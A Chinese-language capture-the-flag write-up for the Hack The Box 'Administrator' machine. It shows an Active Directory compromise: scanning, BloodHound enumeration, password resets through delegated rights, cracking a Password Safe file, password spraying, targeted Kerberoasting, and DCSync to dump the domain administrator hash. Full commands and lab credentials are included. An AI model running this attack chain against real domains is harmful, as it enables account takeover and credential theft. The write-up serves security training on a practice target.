HTB打靶记录-Administrator

# 信息收集

nmap -sV -sC -O 10.10.11.42

1. Nmap scan report for 10.10.11.42
2. Host is up (0.70s latency).
3. Not shown: 986 closed tcp ports (reset)
4. PORT      STATE SERVICE       VERSION
5. 21/tcp    open  ftp           Microsoft ftpd
6. | ftp-syst:
7. |_  SYST: Windows_NT
8. 53/tcp    open  domain        Simple DNS Plus
9. 88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-06 15:12:01Z)
10. 135/tcp   open  msrpc         Microsoft Windows RPC
11. 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
12. 389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
13. 445/tcp   open  microsoft-ds?
14. 464/tcp   open  kpasswd5?
15. 593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
16. 636/tcp   open  tcpwrapped
17. 3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
18. 3269/tcp  open  tcpwrapped
19. 5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
20. |_http-title: Not Found
21. |_http-server-header: Microsoft-HTTPAPI/2.0
22. 49153/tcp open  msrpc         Microsoft Windows RPC
23. No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
24. TCP/IP fingerprint:
25. OS:SCAN(V=7.95%E=4%D=4/6%OT=21%CT=1%CU=44685%PV=Y%DS=2%DC=I%G=Y%TM=67F23C59
26. OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=RD%CI=I%II=I%TS=A)SEQ
27. OS:(SP=106%GCD=1%ISR=10A%TI=RD%CI=RD%TS=9)SEQ(SP=108%GCD=1%ISR=10D%TI=RD%CI
28. OS:=RD%II=I%TS=A)SEQ(SP=F9%GCD=1%ISR=110%TI=RD%CI=I%II=I%TS=A)SEQ(SP=FD%GCD
29. OS:=1%ISR=110%TI=RD%CI=I%TS=A)OPS(O1=M542NW8ST11%O2=M542NW8ST11%O3=M542NW8N
30. OS:NT11%O4=M542NW8ST11%O5=M542NW8ST11%O6=M542ST11)WIN(W1=FFFF%W2=FFFF%W3=FF
31. OS:FF%W4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M542NW8NNS%CC=Y%Q=
32. OS:)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=A
33. OS:R%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=
34. OS:80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0
35. OS:%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z
36. OS:%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G
37. OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
39. Network Distance: 2 hops
40. Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
42. Host script results:
43. | smb2-security-mode:
44. |   3:1:1:
45. |_    Message signing enabled and required
46. | smb2-time:
47. |   date: 2025-04-06T15:13:43
48. |_  start_date: N/A
49. |_clock-skew: 6h40m54s
51. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
52. Nmap done: 1 IP address (1 host up) scanned in 218.75 seconds

复制代码

题目描述给了一个凭证：Olivia:ichliebedich
winrm（bloodhound）

通例信息收集，ftp和smb都没什么东西，winrm可以连接，翻了一下目次根本都没啥权限，bloodhound收集一些域信息
faketime "$(ntpdate -q 10.10.11.42 | grep -oP "\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}")" bloodhound-python -u Olivia -p ichliebedich -d administrator.htb -ns 10.10.11.42 -c All

导入GUI，发现Olivia对michael有Genericall权限

GenericAll

直接修改它的暗码
net user michael admin123 /domain
winrm登录
evil-winrm -i 10.10.11.42 -u michael -p admin123
一点用没有，继续查看michael的域关系，对benjamin有ForceChangePassword权限

修改benjamin的暗码
net rpc password benjamin "admin123" -U "administrator.htb/michael%admin123" -S 10.10.11.4
FTP

登录ftp
ftp benjamin@10.10.11.42
下载Backup.psafe3，这是个passwordsafe加密文件，转成hash爆破一下
passwordsafe

pwsafe2john Backup.psafe3 > 1.hash
john 1.hash --wordlist=/usr/share/wordlists/rockyou.txt

passwordsafe软件打开Backup.psafe3，里面是暗码本

1. emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
2. emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
3. alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw

复制代码

暗码喷洒
crackmapexec smb 10.10.11.42 -u user.txt -p pass.txt --continue-on-success

1. SMB         10.10.11.42     445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

复制代码

winrm连接，读取Desktop/user.txt，查看emily的域关系网

GenericWrite

对ethan有GenericWrite权限，kerborasting攻击获取ethan的hash
faketime "$(ntpdate 10.10.11.42|grep -oP '\d{4}-\d{2}-\d{2} \d{2}:\d{2}')" python3 targetedKerberoast.py -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb -d administrator.htb --dc-ip 10.10.11.42

爆破一下

查看ethan的域关系网，对Administrator有DCsync

DCsync

直接打DCsync获取Administrator的NTLM hash
impacket-secretsdump administrator.htb/ethan:limpbizkit@dc.administrator.htb -target-ip 10.10.11.42
用hash登录拿到root.txt

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。